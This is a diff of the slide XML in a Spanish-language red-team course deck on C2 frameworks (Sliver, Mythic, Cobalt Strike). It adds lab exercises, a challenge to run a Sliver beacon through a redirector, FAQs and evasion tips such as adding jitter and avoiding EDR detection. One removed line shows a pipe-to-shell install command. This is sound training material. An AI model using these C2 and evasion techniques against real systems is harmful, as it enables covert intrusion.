--- a/classes/parte-7-red-team-y-operaciones-ofensivas/165-frameworks-c2-cobalt-strike-sliver-y-mythic/clase-165-presentacion.pptx
+++ b/classes/parte-7-red-team-y-operaciones-ofensivas/165-frameworks-c2-cobalt-strike-sliver-y-mythic/clase-165-presentacion.pptx
@@ -17,6 +17,9 @@
     <p:sldId id="265" r:id="rId16"/>
     <p:sldId id="266" r:id="rId17"/>
     <p:sldId id="267" r:id="rId18"/>
+    <p:sldId id="268" r:id="rId19"/>
+    <p:sldId id="269" r:id="rId20"/>
+    <p:sldId id="270" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3198,7 +3201,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>⚠️ Errores comunes</a:t>
+              <a:t>✍️ Ejercicios</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3236,67 +3239,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  El implante no llama a casa — Listener/redirector mal configurado o firewall; revisa puertos y DNS del lab</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  mythic-cli no arranca — Docker no corre o puertos ocupados; revisa docker ps y logs</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  EDR mata el implante al instante — Payload por defecto muy conocido; aplica evasión (Clases 168–169)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Beaconing evidente en el SIEM — Jitter=0; añade jitter y perfil realista</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Sesión se cae al reiniciar la VM — Falta persistencia; se aborda en clases de AD y post-explotación</a:t>
+              <a:t>•  Explica la diferencia entre sesión interactiva y beacon con un caso de uso para cada una.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Genera dos implantes Sliver (HTTPS y mTLS) y compara su tráfico.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Instala un agente en Mythic y lista sus comandos disponibles.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Configura jitter alto y mide cómo cambia el patrón de check-in.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Elabora una tabla comparativa Cobalt Strike vs Sliver vs Mythic (licencia, canales, extensibilidad).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Lista 5 IOCs por defecto de Sliver que un SOC podría alertar.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3347,7 +3365,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>❓ Preguntas frecuentes</a:t>
+              <a:t>📝 Reto verificable</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3385,82 +3403,22 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  ❓ ¿Por qué no usamos Cobalt Strike directamente?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Es comercial y su uso requiere licencia legítima. Sliver y Mythic son open source, potentes y suficientes para aprender los conceptos, que son transferibles.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Sliver es "menos detectable" que Cobalt Strike?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Los payloads por defecto de cualquier framework conocido son detectables. Lo que reduce la detección es el perfil de tráfico y la evasión, no la marca del framework.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Qué canal C2 elijo?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  HTTPS con perfil realista para trabajo diario; mTLS para robustez interna del lab; DNS como respaldo sigiloso pero lento.</a:t>
+              <a:t>•  Establece en tu laboratorio una sesión C2 con Sliver que atraviese el redirector de la Clase 164, configurada como beacon con jitter, y documenta al menos 4 IOCs que genera.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Criterio de aceptación: la sesión aparece en sliver &gt; sessions/beacons, el tráfico pasa por el redirector (el team server no es alcanzable directo desde la víctima) y presentas una lista de IOCs…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3511,7 +3469,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🔗 Referencias</a:t>
+              <a:t>⚠️ Errores comunes</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3549,6 +3507,319 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
+              <a:t>•  El implante no llama a casa — Listener/redirector mal configurado o firewall; revisa puertos y DNS del lab</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  mythic-cli no arranca — Docker no corre o puertos ocupados; revisa docker ps y logs</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  EDR mata el implante al instante — Payload por defecto muy conocido; aplica evasión (Clases 168–169)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Beaconing evidente en el SIEM — Jitter=0; añade jitter y perfil realista</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Sesión se cae al reiniciar la VM — Falta persistencia; se aborda en clases de AD y post-explotación</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>❓ Preguntas frecuentes</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Por qué no usamos Cobalt Strike directamente?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Es comercial y su uso requiere licencia legítima. Sliver y Mythic son open source, potentes y suficientes para aprender los conceptos, que son transferibles.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Sliver es "menos detectable" que Cobalt Strike?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Los payloads por defecto de cualquier framework conocido son detectables. Lo que reduce la detección es el perfil de tráfico y la evasión, no la marca del framework.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Qué canal C2 elijo?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  HTTPS con perfil realista para trabajo diario; mTLS para robustez interna del lab; DNS como respaldo sigiloso pero lento.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>🔗 Referencias</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
               <a:t>•  Sliver (BishopFox). &lt;https://github.com/BishopFox/sliver&gt; · &lt;https://sliver.sh/&gt;</a:t>
             </a:r>
           </a:p>
@@ -3599,6 +3870,81 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="274320"/>
+            <a:ext cx="8229600" cy="640080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Diagrama de la clase</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="018be6355e196a2c.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="2884834"/>
+            <a:ext cx="8229600" cy="1728412"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -3683,7 +4029,7 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Conocer y operar los principales frameworks de C2. El alumno montará Sliver y Mythic en su laboratorio, generará implantes, entenderá el modelo de listeners/perfiles y comparará estas plataformas open-source con el estándar comercial (Cobalt Strike), incluyendo cómo cada una genera telemetría que el Blue Team puede detectar.</a:t>
+              <a:t>•  Conocer y operar los principales frameworks de C2. El alumno montará Sliver y Mythic en su laboratorio, generará implantes, entenderá el modelo de listeners/perfiles y comparará estas plataformas…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4077,7 +4423,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📖 Definiciones y características</a:t>
+              <a:t>🧠 Explicación en profundidad</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4115,82 +4461,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Listener: servicio que espera conexiones de implantes (HTTP/HTTPS/DNS/mTLS). Característica: define el canal de entrada.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Implante / agente / beacon: código que se ejecuta en la víctima y llama a casa. Característica: puede ser interactivo o "beacon" con intervalos.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Stager vs stageless: descarga por fases vs payload completo. Característica: stager es pequeño pero hace una petición extra observable.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Beacon (Cobalt Strike): implante de referencia con jitter y sleep configurables. Característica: define el estándar que muchos EDR detectan.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  C2 profile: define cómo se ve el tráfico (Sliver/Mythic tienen equivalentes al Malleable de CS). Característica: clave para el sigilo.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Jitter / sleep: variación aleatoria del intervalo de check-in. Característica: dificulta la detección por periodicidad (beaconing).</a:t>
+              <a:t>•  Un framework de C2 es el sistema operativo del Red Team: genera los implantes, gestiona las sesiones y da al operador la consola desde la que trabaja. Aunque hay muchos, todos comparten el mismo…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Tres piezas explican cualquier C2. El listener es el servicio que espera conexiones (HTTP/HTTPS/DNS/mTLS): define el canal de entrada. El implante (agente o beacon) es el código que corre en la…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Un stager es un payload minúsculo cuya única misión es descargar el implante completo; es pequeño (cabe en una macro o un one-liner) pero hace una petición extra observable —justo el momento que…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Cobalt Strike es el estándar comercial: su implante Beacon y los Malleable C2 profiles definieron el género. Precisamente por ubicuo, es el más perfilado por los EDR —y su uso pirata es ilegal, por…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Sliver (BishopFox, escrito en Go) es open source, multiplataforma y moderno: mTLS por defecto, implantes stageless robustos y una consola cómoda. Es el caballo de batalla gratuito del laboratorio.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Mythic es un framework modular sobre Docker: separa el servidor de los agentes (Apollo, Medusa…) y los C2 profiles, de modo que se extiende con perfiles y agentes nuevos sin tocar el núcleo.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Framework — Licencia</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4241,7 +4602,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧰 Herramientas y preparación</a:t>
+              <a:t>📖 Definiciones y características</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4279,67 +4640,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Sliver: curl https://sliver.sh/install | sudo bash (o binarios del release en GitHub).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Mythic: Docker + git clone https://github.com/its-a-feature/Mythic &amp;&amp; ./mythic-cli start.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Cobalt Strike es comercial y licenciado: aquí solo se estudia conceptualmente; no se distribuye ni se usan versiones pirateadas.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  La infraestructura de redirectores de la Clase 164 como front-end de los listeners.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  VMs Windows/Linux de laboratorio para desplegar implantes.</a:t>
+              <a:t>•  Listener: servicio que espera conexiones de implantes (HTTP/HTTPS/DNS/mTLS). Característica: define el canal de entrada.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Implante / agente / beacon: código que se ejecuta en la víctima y llama a casa. Característica: puede ser interactivo o "beacon" con intervalos.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
